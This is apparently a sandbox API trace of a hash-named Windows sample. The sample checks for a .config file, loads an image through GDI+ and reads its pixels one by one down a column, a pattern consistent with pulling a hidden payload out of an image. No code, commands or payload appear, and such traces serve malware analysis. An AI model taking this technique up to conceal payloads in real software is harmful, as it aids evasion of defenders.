[0162.461] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19de18 | out: lpFileInformation=0x19de18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0162.462] GetLastError () returned 0x2
[0162.462] SetErrorMode (uMode=0x0) returned 0x1
[0163.029] IIDFromString (in: lpsz="{0000000C-0000-0000-C000-000000000046}", lpiid=0x23d1210 | out: lpiid=0x23d1210) returned 0x0
[0163.030] GdipLoadImageFromStream (stream=0x4e10030, image=0x19d85c) returned 0x0
[0163.971] GetLastError () returned 0x0
[0163.978] GdipImageForceValidation (image=0x657fb18) returned 0x0
[0164.010] GetLastError () returned 0x0
[0164.013] GdipGetImageType (image=0x657fb18, type=0x19d858) returned 0x0
[0164.013] GetLastError () returned 0x0
[0164.166] GdipGetImageRawFormat (image=0x657fb18, format=0x19d7c4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
[0164.166] GetLastError () returned 0x0
[0164.260] GdipGetImageWidth (image=0x657fb18, width=0x19dec4) returned 0x0
[0164.260] GetLastError () returned 0x57
[0164.271] GdipGetImageHeight (image=0x657fb18, height=0x19dec4) returned 0x0
[0164.271] GetLastError () returned 0x57
[0164.289] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.289] GetLastError () returned 0x57
[0164.289] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.289] GetLastError () returned 0x57
[0164.294] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=0, color=0x19de90) returned 0x0
[0164.294] GetLastError () returned 0x57
[0164.315] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.315] GetLastError () returned 0x57
[0164.316] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.316] GetLastError () returned 0x57
[0164.316] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=1, color=0x19de90) returned 0x0
[0164.316] GetLastError () returned 0x57
[0164.346] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=2, color=0x19de90) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=3, color=0x19de90) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=4, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=5, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=6, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=7, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=8, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=9, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=10, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=11, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=12, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=13, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=14, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=15, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=16, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=17, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=18, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=19, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=20, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=21, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=22, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=23, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=24, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=25, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.351] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.351] GetLastError () returned 0x57
[0164.351] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.351] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=26, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=27, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=28, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=29, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=30, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=31, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=32, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=33, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=34, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=35, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=36, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=37, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=38, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=39, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=40, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=41, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=42, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=43, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=44, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=45, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=46, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=47, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=48, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=49, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=50, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=51, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=52, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=53, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=54, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=55, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=56, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=57, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=58, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=59, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=60, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=61, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=62, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=63, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=64, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=65, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=66, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=67, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=68, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=69, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=70, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=71, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
